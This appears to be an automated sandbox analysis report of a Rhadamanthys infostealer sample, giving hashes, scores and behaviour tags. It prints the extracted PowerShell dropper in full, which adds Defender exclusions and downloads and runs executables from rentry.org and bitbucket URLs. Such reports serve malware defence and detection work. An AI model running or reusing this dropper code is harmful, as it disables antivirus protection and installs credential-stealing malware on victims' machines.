rhadamanthys

General

Target

Nicht bestätigt 879324.crdownload
Size

1.4MB
Sample

240607-slps8aac5v
MD5

e3970ffa96653f138e63ad0148970dac
SHA1

b466278571bc1b20f2cf767b2222c17449ee1dbc
SHA256

5a32b1864bcb2d237aca956c3b7474c2de484c38cbaa608ab5ffc71214bae2b8
SHA512

af9e28a39cda24521ad4239d8c616bffbb63a44ae3efedbf9320f83146b5ada758fc2d76fdba07e89bf9066088fd7159650b66c998549c49fbdade1022c0a163
SSDEEP

24576:CvJwL1rOBrsdTKf8oyVJHOohsXiV61rbXWcbd7JFV9MGiwS5OlliRw+gj8jbpRtQ:yJwxrOBaTKf8NVtOPXdbNHFVKc/izgjz

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

1
<#bji#> Add-MpPreference <#gap#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zkd#> -Force <#hep#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/lem61111111111/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#nmy#> (Join-Path <#cpg#> -Path $env:AppData <#jig#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#bwf#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#nzz#> (Join-Path -Path $env:AppData <#qua#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#idz#>

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language

ps1

Deobfuscated

1
(new-object system.net.webclient).downloadfile("https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar", "C:\\Users\\Admin\\AppData\\Local\\Temp\\downloaded_archive.rar")
2

URLs

exe.dropper

https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar

Targets

- Target
  
  Zeus 4.7.2.exe
- Size
  
  173KB
- MD5
  
  28e0ba051ad84949cfedd2a58b1636cb
- SHA1
  
  6ff46613adb7594c6abbe0ee9c64a68129501fb8
- SHA256
  
  265013eb61e407130b8fe723809549000ffe4ad96ef6c5ad1945e2727cee5aa0
- SHA512
  
  a14ea1a7e8756e15aee996c848006a1f2212acd753ca1629224b362fe8ef24331c49617f59bd84846b95a2143744418bbd78a4d0088efab76228344662ae67a4
- SSDEEP
  
  3072:NPBBih6XScZZmmiyQrcR6qx6LAIxkN3wlCxvxrtJRscwX7zhhxXNrykAOkvpObQ:Nyh6XffliyQrC6LAIxkpwlOJrtJRscwi
Score

10^/10

rhadamanthys evasion execution persistence spyware stealer
- Rhadamanthys
  Rhadamanthys is an info stealer written in C++ first seen in August 2022.
  stealer rhadamanthys
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
  Using powershell.exe command.
  execution
- Creates new service(s)
  persistence execution
- Drops file in Drivers directory
- Stops running service(s)
  evasion execution
- Executes dropped EXE
- Reads user/profile data of local email clients
  Email clients store some user data on disk where infostealers will often target it.
  spyware stealer
- Reads user/profile data of web browsers
  Infostealers often target stored browser data, which can include saved credentials etc.
  spyware stealer
- Accesses cryptocurrency files/wallets, possible credential harvesting
  spyware
- Adds Run key to start application
  persistence
- Legitimate hosting services abused for malware hosting/C2
- Looks up external IP address via web service
  Uses a legitimate IP lookup service to find the infected system's external IP.
- Maps connected drives based on registry
  Disk information is often read in order to detect sandboxing environments.
- Drops file in System32 directory
- Suspicious use of SetThreadContext
behavioral1
- Target
  
  ZeusHex-GUI.dll
- Size
  
  1.3MB
- MD5
  
  ad714ee48d2e829c5012c65de6166c05
- SHA1
  
  5880bac89ca346dae62c053aa49c028372388edd
- SHA256
  
  7d32d13d123871650794a1e172adc70bc8dafbdb762f49d889f813844d532b20
- SHA512
  
  a51252950455dbfb5dfd564689e605b022bdf26f80ad12f3fde3e341a14b8f764324ff3be6f29e4855bd499141e23628e9aabb0e439627dc802814db091d54ee
- SSDEEP
  
  24576:ZfaPwrgBrO1BKH8jPcWYVxHCoh0XeV61r9qZWe7d7NWS91GsVz9cebgS9aI:ZCPwrgBWBKH8jkDVFCNXODzWS9HfX0HI
Score

1^/10
behavioral2